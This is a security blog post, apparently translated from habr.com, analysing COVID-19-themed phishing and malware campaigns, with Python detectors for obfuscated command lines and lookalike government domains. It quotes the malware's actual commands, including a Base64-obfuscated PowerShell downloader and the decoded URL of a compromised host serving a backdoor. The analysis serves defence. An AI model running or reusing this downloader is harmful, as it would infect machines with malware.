Coronavirus cyberattacks: all the salt in social engineering

Attackers continue to exploit the topic of COVID-19, creating more and more new threats for users who are keenly interested in everything related to the epidemic. In our last post we already discussed what types of malware have appeared in the wake of the coronavirus; today we look at the social engineering techniques that users in different countries, including Russia, have already encountered. General trends and examples are under the cut.


Remember how last time we talked about people willingly reading not only about the coronavirus and the course of the epidemic, but also about financial support measures? Here is a good example. A curious phishing attack was discovered in the German state of North Rhine-Westphalia (NRW). The attackers created copies of the website of the NRW Ministry of Economic Affairs, where anyone can apply for financial assistance. Such a program really exists, and it played into the hands of scammers. Having received the personal data of their victims, they submitted an application on the real ministry website but specified different bank details. According to official figures, 4 such fake requests were made before the scheme was exposed. As a result, $109 million intended for affected citizens ended up in the hands of fraudsters.


Would you like a free COVID-19 test?

Another prominent example of coronavirus-themed phishing was found in email. The messages attracted users' attention with an offer of free testing for coronavirus infection. The attachments to these emails carried samples of Trickbot/Qakbot/Qbot. When those who wanted to check their health proceeded to "fill out the attached form", a malicious script was downloaded to the computer. To evade sandboxes, the script started downloading the main malware only after a delay, once the protection systems had concluded that no malicious activity was taking place.

Convincing most users to enable macros was also easy. A standard trick was used: to fill out the questionnaire, you must first enable macros, which means running a VBA script.


As you can see, the VBA script is specially masked from antiviruses.


The Windows choice command has a timeout option: with /T <seconds> it waits that long and then accepts the default answer (/D Y, i.e. "Yes") automatically, which makes it a convenient substitute for sleep. In this case the script waited 65 seconds before deleting its temporary files:

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt

While it waited, the malware was downloaded by a separate PowerShell one-liner:

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt

After decoding the Base64 values, the PowerShell script downloads a backdoor hosted on a previously compromised web server in Germany:

http://automatischer-staubsauger.com/feature/777777.png

and saves it as:

C:\Users\Public\tmpdir\file1.exe

The folder 'C:\Users\Public\tmpdir' is created when the file 'tmps1.bat' is run; it contains the command cmd /c mkdir ""C:\Users\Public\tmpdir"".
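The command lines above show three tricks worth catching on the endpoint: a long choice /T timeout used as a sleep, a download URL hidden inside FromBase64String('...'), and a file extension split into single-character fragments ('.e' + 'x' + 'e'). The following Python is an added example, not code from the original post or from any of the vendors it cites: it takes command lines as they would be recorded by process-creation logging, decodes the Base64 literals, reassembles the concatenated fragments and reports the findings. The sample command lines are constructed for the example (the first two are modelled on the ones quoted above, the third is a benign interactive use of choice), and the 30-second delay threshold is an assumption.

```python
import base64
import re

# Constructed sample command lines for this example. The first two are modelled on
# the commands quoted in the post (the URL and paths are the post's own); the third
# is a benign interactive use of `choice` and must not be flagged.
SAMPLE_COMMAND_LINES = [
    r"cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt",
    r'''cmd /C powershell -Command "(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e')" >C:\Users\Public\1.txt''',
    r'choice /C YN /M "Continue?"',
]

# Base64 literal passed to FromBase64String('...')
B64_LITERAL = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", re.IGNORECASE)
# A run of quoted fragments glued together with '+', e.g. '1' + '.e' + 'x' + 'e'
CONCAT_RUN = re.compile(r"(?:'[^']*'\s*\+\s*)+'[^']*'")
FRAGMENT = re.compile(r"'([^']*)'")
# choice ... /T <seconds>: the timeout that turns choice into a sleep
CHOICE_TIMEOUT = re.compile(r"\bchoice\b[^&|]*?/T\s+(\d+)", re.IGNORECASE)
DOWNLOAD_API = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Start-BitsTransfer", re.IGNORECASE)
PAYLOAD_EXT = (".exe", ".dll", ".bat", ".ps1", ".vbs", ".js")
MIN_SUSPICIOUS_DELAY = 30  # seconds; threshold is an assumption made for this example


def decode_b64_literals(cmdline):
    """Decode every FromBase64String('...') argument that is valid ASCII text."""
    decoded = []
    for match in B64_LITERAL.finditer(cmdline):
        try:
            decoded.append(base64.b64decode(match.group(1), validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue  # binary or malformed blob: not a string we can reason about
    return decoded


def reassemble_concat(cmdline):
    """Join runs of quoted fragments so that '1' + '.e' + 'x' + 'e' becomes '1.exe'."""
    return ["".join(FRAGMENT.findall(run.group(0))) for run in CONCAT_RUN.finditer(cmdline)]


def analyse(cmdline):
    """Return a dict of findings for one command line; an empty dict means nothing suspicious."""
    findings = {}
    decoded = decode_b64_literals(cmdline)
    if decoded:
        findings["decoded_literals"] = decoded
    urls = [d for d in decoded if d.lower().startswith(("http://", "https://"))]
    if urls and DOWNLOAD_API.search(cmdline):
        findings["download_from_encoded_url"] = urls
    split_names = [s for s in reassemble_concat(cmdline) if s.lower().endswith(PAYLOAD_EXT)]
    if split_names:
        findings["split_extension"] = split_names
    timeout = CHOICE_TIMEOUT.search(cmdline)
    if timeout and int(timeout.group(1)) >= MIN_SUSPICIOUS_DELAY:
        findings["choice_delay_seconds"] = int(timeout.group(1))
    return findings


def scan(cmdlines):
    """Map index -> findings for every command line that produced at least one finding."""
    return {i: f for i, f in ((i, analyse(c)) for i, c in enumerate(cmdlines)) if f}


if __name__ == "__main__":
    for index, findings in scan(SAMPLE_COMMAND_LINES).items():
        print(index, findings)
```

Decoding the literals is what makes the detection robust: a rule that only looks for "http" in the command line never sees the URL, while a rule keyed on the decoded value also catches the same downloader if the attacker re-encodes a different server. The same function can be pointed at Sysmon event 1 or Windows 4688 command lines exported as text.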

Targeted attack on state structures

In addition, FireEye analysts recently reported a targeted APT32 attack aimed at government structures in Wuhan as well as the Chinese Ministry of Emergency Management. One of the RTF files distributed contained a link to a New York Times article titled "Coronavirus Live Updates: China is Tracking Travelers From Hubei". However, opening it downloaded malware (FireEye analysts identified the sample as METALJACK).

Interestingly, at the time of discovery none of the antivirus engines on VirusTotal detected this sample.


When official sites are down

The clearest example of a phishing attack happened in Russia just the other day. The trigger was the long-awaited allowance for children aged 3 to 16. When it was announced that applications would be accepted starting May 12, 2020, millions rushed to the Gosuslugi portal for the long-awaited help and took it down no worse than a professional DDoS attack would have. When the president said that "Government Services failed to cope with the flow of applications," rumours spread online that an alternative site for accepting applications had been launched.


The problem is that several sites appeared at once: while the real one at posobie16.gosuslugi.ru really does accept applications, dozens of others collect the personal data of gullible users.

Colleagues from SearchInform found about 30 new fraudulent domains in the .ru zone. Infosecurity a Softline Company has tracked more than 70 similar fake government-services sites since the beginning of April. Their creators play on the familiar symbols and also use combinations of the words gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, and so on.
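The fake sites share one property with every lookalike domain: they carry the brand word or a service keyword, but their registrable domain is not gosuslugi.ru. The Python below is an added example (not code from the post, SearchInform or Softline) of a triage filter for newly observed hostnames, for instance from passive DNS or certificate-transparency feeds. It treats only hosts under gosuslugi.ru as official, flags anything else that contains one of the keywords listed above, and also catches one- or two-character typos of the brand word with an edit-distance check. The hostnames are constructed for the example and are not claimed to be real domains; the distance and token-length thresholds are assumptions.

```python
import re

# Constructed hostnames for this example; they illustrate the patterns the post
# describes and are not claimed to be real domains.
SAMPLE_HOSTNAMES = [
    "posobie16.gosuslugi.ru",      # the real application site named in the post
    "gosuslugi-16.ru",             # brand word plus "-16", outside the official zone
    "covid-vyplaty.ru",            # keyword from the post
    "gosuslugi.ru.posobie-16.ru",  # official name used as a subdomain of another zone
    "gosuslugl.ru",                # one-character typo of the brand
    "mos.ru",                      # unrelated, should not be flagged
]

OFFICIAL_ZONE = "gosuslugi.ru"
BRAND = "gosuslugi"
# Words the post says the fake sites combine
KEYWORDS = ("gosuslugi", "gosuslugi-16", "vyplaty", "covid-vyplaty", "posobie")
MAX_EDIT_DISTANCE = 2  # assumption for this example
MIN_TOKEN_LEN = 6      # short labels such as "ru" or "mos" are never compared to the brand


def normalize(hostname):
    """Lower-case and strip the trailing dot of an absolute name."""
    return hostname.strip().rstrip(".").lower()


def is_official(hostname):
    """True only when the registrable domain really is gosuslugi.ru."""
    h = normalize(hostname)
    return h == OFFICIAL_ZONE or h.endswith("." + OFFICIAL_ZONE)


def levenshtein(a, b):
    """Classic edit distance (insert, delete, substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(hostname):
    """Return 'official', 'lookalike' or 'other' for one hostname."""
    if is_official(hostname):
        return "official"
    h = normalize(hostname)
    # Keyword anywhere outside the official zone, including "gosuslugi.ru" used as a subdomain
    if any(keyword in h for keyword in KEYWORDS):
        return "lookalike"
    # Typo-squats of the brand word: compare each label piece to the brand
    for token in re.split(r"[.\-]", h):
        if len(token) >= MIN_TOKEN_LEN and levenshtein(token, BRAND) <= MAX_EDIT_DISTANCE:
            return "lookalike"
    return "other"


def find_lookalikes(hostnames):
    """Filter a feed of hostnames down to the ones worth a takedown request or a block."""
    return [h for h in hostnames if classify(h) == "lookalike"]


if __name__ == "__main__":
    for host in SAMPLE_HOSTNAMES:
        print(f"{host:30} {classify(host)}")
```

The suffix check is deliberately strict: "gosuslugi.ru.posobie-16.ru" starts with the official name but is registered under a different zone, which is exactly the trick a user reading a browser address bar from left to right falls for.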

Hype and social engineering

All these examples only confirm that attackers are successfully monetizing the coronavirus theme. The higher the social tension and the more unresolved questions there are, the more likely scammers are to steal important data, get people to hand over their money themselves, or simply compromise more computers.

And given that the pandemic has forced potentially unprepared people to work from home en masse, not only personal but also corporate data are at risk. For example, users of Microsoft 365 (formerly Office 365) were recently phished too. People received mass mailings with "missed voice message" attachments. In fact, the files were an HTML page that redirected the victims to a fake Microsoft 365 sign-in page. As a result, access is lost and all data in the account is compromised.

Source: habr.com
